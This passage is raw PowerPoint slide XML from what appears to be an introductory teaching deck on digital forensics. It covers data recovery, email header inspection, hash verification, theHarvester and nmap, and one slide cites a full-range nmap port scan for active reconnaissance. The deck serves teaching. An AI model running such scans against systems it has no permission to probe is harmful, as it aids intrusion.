            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="829" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="5159160" cy="3200040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="830" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733920" y="3105000"/>
            <a:ext cx="4997160" cy="3295440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5638320" y="2439000"/>
            <a:ext cx="1055160" cy="609120"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="5A5A5A"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="2362320"/>
            <a:ext cx="1828440" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Redirected</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Digital Forensic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1447800"/>
            <a:ext cx="8305800" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Branch of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>forensic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> science encompassing the recovery and investigation of material found in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>devices, often in relation to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> crime.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://aventis.edu.sg/mobile/img/content/prograd-dip-digital-forensic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131" y="3740331"/>
            <a:ext cx="573405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9656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Data Recovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="7924800" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Process of salvaging and handling the data through the data from damaged, failed, corrupted, or inaccessible secondary storage media</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://history-computer.com/ModernComputer/Basis/images/HDDconstru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75" y="2852057"/>
            <a:ext cx="7402649" cy="361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457200" y="152640"/>
            <a:ext cx="7391160" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Active information gathering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Active information gathering should be detected by the target and suspicious or malicious behaviour. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>During this stage we are actively mapping network infrastructure (think full port scans nmap –p1-65535),  actively enumerating and/or vulnerability scanning the open services, we are actively searching for unpublished directories, files, and servers. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Most of this activity falls into your typically “reconnaissance” or “scanning” activities for your standard pentest</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30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08"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09"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86169E7F-7054-422A-B912-48F0975C28F3}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>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TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1905000"/>
            <a:ext cx="8153400" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Any file that’s deleted actually stays on your drive until it’s overwritten with another file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You actually have a pretty good chance of getting the file back.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Problem of recovery when you file have been overwritten.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="binary-ones-zeroes"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="46415" b="7265"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4545874"/>
            <a:ext cx="9144000" cy="199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7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20" y="838200"/>
            <a:ext cx="898358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5962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Network Forensic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1752600"/>
            <a:ext cx="8153400" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collecting internet evidence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. IP Addresses, E-mail header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example from www.whatismyip.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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04" y="3200400"/>
            <a:ext cx="352425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434" y="3048000"/>
            <a:ext cx="52387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173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5122" name="Picture 2" descr="http://www.freeviewer.org/new/img/email-head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06" y="1066800"/>
            <a:ext cx="8401594" cy="5601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228600"/>
            <a:ext cx="7106194" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>E-mail header forensic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15159708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Mail Header Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1600200"/>
            <a:ext cx="8153400" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Gmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the message in your Gmail inbox.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click the down-arrow in the top-right corner of the message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click the "Show original" link toward the bottom of the options box. The message will open in a separate window with the full message headers at the top.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Microsoft Outlook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the message in Microsoft Outlook.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select "View," then "Options."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You'll see the headers in the "Internet Headers" box.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Yahoo Mail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the email message in your Yahoo Mail inbox.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click the "Full Headers" link located in the lower-right corner of the email message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="http://www.androidheadlines.com/wp-content/uploads/2014/01/gmail-logo-624x33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418" t="13553" r="20659" b="11200"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1157151"/>
            <a:ext cx="1233867" cy="8860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fr/6/68/Logo_Microsoft_Outlook_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276600"/>
            <a:ext cx="1714143" cy="171414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theinquirer.net/IMG/559/254559/yahoo-mai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638086"/>
            <a:ext cx="1143714" cy="11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9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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5715000"/>
            <a:ext cx="8152920" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Verify hash with md5&amp;sha-1 checksum utility</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6172200"/>
            <a:ext cx="3428640" cy="304560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>4/10/15</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312"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13"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AEAC7C08-69D0-474F-992E-A8B342C92BB3}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="TextShape 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4952880"/>
            <a:ext cx="8152920" cy="761760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Download at code.google.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8991360" cy="504648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457200" y="-457200"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The harvester</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317"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18"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19"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69858C50-603B-4C11-B082-EF23E3DB1901}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="320" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447920" y="914400"/>
            <a:ext cx="6476760" cy="53766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57200" y="228600"/>
            <a:ext cx="8381520" cy="4571640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Network scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>ports and service discovery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4800600"/>
            <a:ext cx="6857640" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323"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24"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25"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5910C165-D2C3-4E9C-BFED-A1B103B13C37}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>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457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Is the popular choice of tool in term of scanning the networks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Can be download at : http://nmap.org/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Latest version is 6.40</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Alternatives: Zenmap GUI of Nmap. (GUI Based)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
